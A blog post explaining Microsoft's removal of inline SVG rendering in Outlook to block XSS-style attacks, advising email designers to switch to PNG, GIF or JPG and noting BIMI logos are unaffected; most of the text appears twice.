Microsoft is pulling support for inline SVG images
Microsoft is removing support for inline SVG images in Outlook for Web and Outlook for Windows. This started rolling out in early September and should hit everyone by mid October. BleepingComputer has the full writeup here.
Email designers and coders, be aware. Though, I rather suspect that only a tiny fraction of email designers were building emails that utilized inline SVG images. Microsoft says less than 0.1 percent of images fall into this bucket. Most ESPs and most templates stick to PNGs and JPGs, thus I suspect the impact for non-malicious uses is likely minimal.
What is SVG, anyway?
SVG (Scalable Vector Graphic) images are graphics defined in text, using XML. Instead of storing pixels, it stores shapes, paths, lines, curves, and text as math. Open your favorite SVG image in a text editor and you'll see some almost-human readable data, a series of instructions that describe how to draw the image. It reminds me a bit of Postscript, the Adobe language that drove the growth of desktop publishing and laser printing in the 1990s. Different code, different instructions, different focus – but both can be opened in an editor, reviewed, and tweaked, if you've got the right kind of expertise.
Why Microsoft Removed Support
The reason for the change: Attackers found creative ways to utilize SVG in Outlook. SVG formatted files can contain scripts and embedded content, and the bad guys have taken advantage of that. Microsoft says this update helps block XSS style attacks that were being delivered through these images.
If you were one of the rare senders experimenting with inline SVG, you'll now see a blank space where your graphic used to be. SVG images as attached files remain untouched. The block only applies to inline rendering inside the message body.
What about BIMI logos?
The Brand Indicators for Message Identification (BIMI) logo standard also uses a form of SVG P/S format called tiny-ps. This is a simplified, restricted profile without the riskier parts of full SVG. And the broader mailbox requirements for BIMI logos necessitate use of a CMC (Common Mark Certificate) or VMC (Verified Mark Certificate), which go through a validation process to confirm, among other things, that they don't contain anything unsafe.
So while BIMI also uses SVG as the format for email sender logos, nobody is using certified BIMI logos as an attack vector, and this latest Microsoft news has no impact on or intersection with BIMI.
And note that while Microsoft does not currently have support for BIMI logos, even if they did, the BIMI logo is not rendered in the email body -- it is typically displayed as a separate element, outside the body of the message.
If you're in the email design world and relying on inline SVG for icons, logos, or UI elements in your template, it's time to switch those to PNG, GIF or JPG. For anyone else? Nothing to see here.
Microsoft is removing support for inline SVG images in Outlook for Web and Outlook for Windows. This started rolling out in early September and should hit everyone by mid October. BleepingComputer has the full writeup here.
Email designers and coders, be aware. Though, I rather suspect that only a tiny fraction of email designers were building emails that utilized inline SVG images. Microsoft says less than 0.1 percent of images fall into this bucket. Most ESPs and most templates stick to PNGs and JPGs, thus I suspect the impact for non-malicious uses is likely minimal.
What is SVG, anyway?
SVG (Scalable Vector Graphic) images are graphics defined in text, using XML. Instead of storing pixels, it stores shapes, paths, lines, curves, and text as math. Open your favorite SVG image in a text editor and you'll see some almost-human readable data, a series of instructions that describe how to draw the image. It reminds me a bit of Postscript, the Adobe language that drove the growth of desktop publishing and laser printing in the 1990s. Different code, different instructions, different focus – but both can be opened in an editor, reviewed, and tweaked, if you've got the right kind of expertise.Why Microsoft Removed Support
The reason for the change: Attackers found creative ways to utilize SVG in Outlook. SVG formatted files can contain scripts and embedded content, and the bad guys have taken advantage of that. Microsoft says this update helps block XSS style attacks that were being delivered through these images.What about BIMI logos?
The Brand Indicators for Message Identification (BIMI) logo standard also uses a form of SVG P/S format called tiny-ps. This is a simplified, restricted profile without the riskier parts of full SVG. And the broader mailbox requirements for BIMI logos necessitate use of a CMC (Common Mark Certificate) or VMC (Verified Mark Certificate), which go through a validation process to confirm, among other things, that they don't contain anything unsafe.So while BIMI also uses SVG as the format for email sender logos, nobody is using certified BIMI logos as an attack vector, and this latest Microsoft news has no impact on or intersection with BIMI.
If you're in the email design world and relying on inline SVG for icons, logos, or UI elements in your template, it's time to switch those to PNG, GIF or JPG. For anyone else? Nothing to see here.
Comments
Post a Comment
Comments policy: Al is always right. Kidding, mostly. Be polite, please and thank you.